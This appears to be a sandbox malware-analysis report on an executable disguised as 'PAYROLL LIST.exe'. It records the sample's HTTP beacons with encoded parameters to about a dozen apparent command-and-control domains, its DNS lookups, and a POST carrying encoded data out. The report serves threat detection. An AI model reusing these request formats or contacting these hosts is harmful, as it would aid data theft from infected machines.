Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\PAYROLL LIST.exe

Code function: 0_2_00A74EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00A74EB5

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKdate: Sun, 24 Nov 2024 07:29:53 GMTserver: Apacheset-cookie: __tad=1732433393.8125098; expires=Wed, 22-Nov-2034 07:29:53 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 9b 15 dc 04 9b 37 03 c8 8a b3 15 1b 64 3b f3 c7 38 bf cc 3c 86 6d 47 f1 fc 1e e2 7e 2a ec a3 ce 68 27 3b 3f 21 8a 9d 09 b1 d8 a7 7a 3d c2 74 87 ea c1 52 fe e4 6e 7e 3a fd bf 76 c5 32 23 21 ea 3e 02 63 75 9b a3 f7 63 c7 ff fe 0e 63 57 9f 8f 1c 1d 78 8a e1 da d5 dc 68 88 d8 8d 77 5b 5b af ce 5e 2f 5e eb e5 5b 38 02 a3 47 10 d3 a6 cb 30 a2 af 37 da 75 ce cb f4 ac 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 1d 8c 5c 99 d5 26 b0 fa c3 0a ac b3 b8 ce aa 52 41 eb b1 91 ff 9c df 38 09 cb ac fa d0 19 7d 0b 2d 7a 1c 07 d5 12 fa 52 28 be 38 9c 9f ab 58 37 b9 29 7b 24 4e cb 09 2f f0 e7 d6 ec 64 ca 15 b8 f3 6d 0a 3c 40 c4 44 99 2e d6 f0 fd f2 8b 7c a9 ea 9b 78 2f 1f 13 b3 f3 68 79 ec 40 fc 2b fc 02 65 0b a8 8a 1c 04 00 00 Data Ascii: TM0=7b=$qQHmHH hL&vVwiX\|I<~o8eK}W%eU6nKq$etPw$nN)enh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w\|!2Ye 6MgW gau,WC}!xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.\|x/hy@+e
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKdate: Sun, 24 Nov 2024 07:29:58 GMTserver: Apacheset-cookie: __tad=1732433398.3193406; expires=Wed, 22-Nov-2034 07:29:58 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 9b 15 dc 04 9b 37 03 c8 8a b3 15 1b 64 3b f3 c7 38 bf cc 3c 86 6d 47 f1 fc 1e e2 7e 2a ec a3 ce 68 27 3b 3f 21 8a 9d 09 b1 d8 a7 7a 3d c2 74 87 ea c1 52 fe e4 6e 7e 3a fd bf 76 c5 32 23 21 ea 3e 02 63 75 9b a3 f7 63 c7 ff fe 0e 63 57 9f 8f 1c 1d 78 8a e1 da d5 dc 68 88 d8 8d 77 5b 5b af ce 5e 2f 5e eb e5 5b 38 02 a3 47 10 d3 a6 cb 30 a2 af 37 da 75 ce cb f4 ac 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 1d 8c 5c 99 d5 26 b0 fa c3 0a ac b3 b8 ce aa 52 41 eb b1 91 ff 9c df 38 09 cb ac fa d0 19 7d 0b 2d 7a 1c 07 d5 12 fa 52 28 be 38 9c 9f ab 58 37 b9 29 7b 24 4e cb 09 2f f0 e7 d6 ec 64 ca 15 b8 f3 6d 0a 3c 40 c4 44 99 2e d6 f0 fd f2 8b 7c a9 ea 9b 78 2f 1f 13 b3 f3 68 79 ec 40 fc 2b fc 02 65 0b a8 8a 1c 04 00 00 Data Ascii: TM0=7b=$qQHmHH hL&vVwiX\|I<~o8eK}W%eU6nKq$etPw$nN)enh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w\|!2Ye 6MgW gau,WC}!xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.\|x/hy@+e

Source: global traffic	HTTP traffic detected: GET /fev0/?s8q=0RJLtN5PAfjxwlrp&ftMDw=ZsYTLU62Pg4Ji1Y7yKx0R+43dnCF/DoTsxMfn/Xy/YyeGOVtNzq5pky0tbrPVR8P9zBOlb50dZZ9z8YaOITKpfTM6+zZhK0Vfjoc5PqIe4votSjOaPjz9cBe2KS72Lx57OWhQ20= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.thaor56.onlineUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /98j3/?ftMDw=jo1iJOnj8ueGZPJABf2g0H8HuOKbJgV1DdtSaCSQL5v3UEYBE5VATgrqgu9yCYXU1qT81UG2HbOLQLBbZNDoC7f9WIoubj4Q4JNsFH14w6x5H8IcaKKhJ/aIzC8GXeQraEN4MBg=&s8q=0RJLtN5PAfjxwlrp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.optimismbank.xyzUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /r3zg/?ftMDw=du4jOMLkh7fLnmDuLYOIPa2Wp2ys3F+jaV3EKcXkS3D/yxi6pio40SibWtKrR6Fw1AeDGXhTcKeneAqCGOT0074duoQOsgGdcsNcrIEp/1wXAjvdugthi8/c+6JcbCpqpe/rFrA=&s8q=0RJLtN5PAfjxwlrp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.greenthub.lifeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /n2c9/?ftMDw=3x/7f4nzUvf4Ssmpt1jlNGgCnZA9EhdoZs8QEOaGeCkTK2Ae1JBrg2/7Qirl6WfPBEFIuXRetS7qNq3tJgV/CPoWBEtyT9QkzZx0kn+vpM9MetzAzCeiDLL5rMhSVwK26gXmhOI=&s8q=0RJLtN5PAfjxwlrp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.laohub10.netUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /uf7y/?s8q=0RJLtN5PAfjxwlrp&ftMDw=X8Xx4Xb3zOwIp/YnRuUSDS9+m9M27HztmVzPPBr+rNKRcobOh5vjSVUUxnTRN3k+HcX7svN7WZWipHk078Y7uIxlsu2feUJ4Szk5xT5T+y3eU9uLCnOG2a5m16YfDmqw1YUm1PU= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.bankseedz.infoUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /3iym/?ftMDw=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/faBYURW8ZeFt/JnnXLur5vg8ZgSRROrLy1+lGHKJKNnWrxIb45jIiCNbhxH2Mr3ltZMyC0=&s8q=0RJLtN5PAfjxwlrp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.madhf.techUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /hkgx/?ftMDw=wgVoJ8uM9T0/Zez2re1RszMbFHmAlDimGOKD8PxxFFLfP5o8U05sZY6pknTlSn+/tcq1eo8k+yVAgRwnrxxUhy4T4sTZM/xDRABQgnb1kzJGDsq+SUnMZJlWPAYumgJQLN5L2R8=&s8q=0RJLtN5PAfjxwlrp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.xcvbj.asiaUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /31pt/?ftMDw=TMDpBYanOquY9Rx7lbKrlsthbxkcecghv73C9/MKdrwqjZcj4ORMyeLFBityLVio1oCUCVJYl2rwHayMePC/ZUs8uwlOB+QB3ca3FBmAxFrBZMPAxBodxEGaS/b2Tezz4FuYEzo=&s8q=0RJLtN5PAfjxwlrp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.yc791022.asiaUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /p3j6/?ftMDw=OVR2CF7p+NAClGW1MELAdr9D19OOCZyiV2x0cNqPuUjpn/Qhs1nMs1p1ZXuPw6NSEK+YKob7dwv93+8G93LPE2HhSCay4NYmxqdiK6FXxy6O+wbL+pa0tLSnaR0JMUJOZeRHums=&s8q=0RJLtN5PAfjxwlrp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.43kdd.topUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /hxi5/?ftMDw=/xN+QifpSgLb8oJZvOcEecwEXTNjyqH/ixYmgFld7FWiq7hEgfqLv6xcCSKy7O4D9GLUZYEuvgkAAG4+HQzEMugr7cJJcxtzNX7Y0CkoSUd8KQdmwlNemHcmzIVDdoEsc/fDA6w=&s8q=0RJLtN5PAfjxwlrp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.jcsa.infoUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /j8pv/?ftMDw=JIuj9wxSnK6mEyWHgqme9cDOp2JPGD2avn5HAjA8ht24L6v+vQ9uqWv6ig59Dwg+VmGSo2u3Iy71OFL1070b1DxYSdomJJ1cIHDMQoeegRhtBSr4yHNpY/YOIyeK233xsrfLHXE=&s8q=0RJLtN5PAfjxwlrp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.1secondlending.oneUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /swhs/?ftMDw=8xf1FTtyUpYkrTYPPLWUAP++SxZR47Hqllrz0dKQmws7hy/+lCnqv8MjCvT/8dHN8wn+YkpcLfbwvxo0J0bTeUs9QjKFG8O2A2x2bIvsQFy4qdLsSxXEiZwT1ITG2O8o4PgX9ko=&s8q=0RJLtN5PAfjxwlrp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.zkdamdjj.shopUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.thaor56.online
Source: global traffic	DNS traffic detected: DNS query: www.optimismbank.xyz
Source: global traffic	DNS traffic detected: DNS query: www.greenthub.life
Source: global traffic	DNS traffic detected: DNS query: www.laohub10.net
Source: global traffic	DNS traffic detected: DNS query: www.bankseedz.info
Source: global traffic	DNS traffic detected: DNS query: www.madhf.tech
Source: global traffic	DNS traffic detected: DNS query: www.xcvbj.asia
Source: global traffic	DNS traffic detected: DNS query: www.yc791022.asia
Source: global traffic	DNS traffic detected: DNS query: www.43kdd.top
Source: global traffic	DNS traffic detected: DNS query: www.jcsa.info
Source: global traffic	DNS traffic detected: DNS query: www.1secondlending.one
Source: global traffic	DNS traffic detected: DNS query: www.zkdamdjj.shop

Source: unknown

HTTP traffic detected: POST /98j3/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 210Connection: closeHost: www.optimismbank.xyzOrigin: http://www.optimismbank.xyzReferer: http://www.optimismbank.xyz/98j3/User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36Data Raw: 66 74 4d 44 77 3d 75 71 64 43 4b 2b 4f 2f 34 4b 6d 51 5a 74 78 75 65 35 57 6d 69 48 55 59 31 75 53 2b 47 31 6f 4a 62 6f 35 2f 54 32 4f 5a 46 2f 7a 48 58 6c 63 4b 41 64 45 52 49 6a 50 4a 75 62 46 61 65 4e 6e 64 30 59 79 64 34 57 79 76 48 62 4f 42 62 59 64 79 64 66 4c 45 50 49 62 6b 54 4b 4e 52 4f 54 6f 76 75 59 68 75 4a 41 49 75 31 5a 30 59 48 37 67 42 58 63 43 42 42 4f 61 49 34 67 6b 32 47 62 34 76 48 33 6c 36 51 46 4d 67 41 62 66 43 58 55 6e 45 5a 31 35 51 74 39 6b 51 6e 2b 48 70 6f 42 77 4d 70 33 78 56 47 76 65 52 32 6e 76 55 51 33 48 66 77 48 72 4e 78 6f 45 62 53 44 51 33 38 4a 44 59 57 33 34 51 48 57 77 73 46 33 76 79 Data Ascii: ftMDw=uqdCK+O/4KmQZtxue5WmiHUY1uS+G1oJbo5/T2OZF/zHXlcKAdERIjPJubFaeNnd0Yyd4WyvHbOBbYdydfLEPIbkTKNROTovuYhuJAIu1Z0YH7gBXcCBBOaI4gk2Gb4vH3l6QFMgAbfCXUnEZ15Qt9kQn+HpoBwMp3xVGveR2nvUQ3HfwHrNxoEbSDQ38JDYW34QHWwsF3vy

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sun, 24 Nov 2024 07:28:33 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:29:06 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:29:08 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
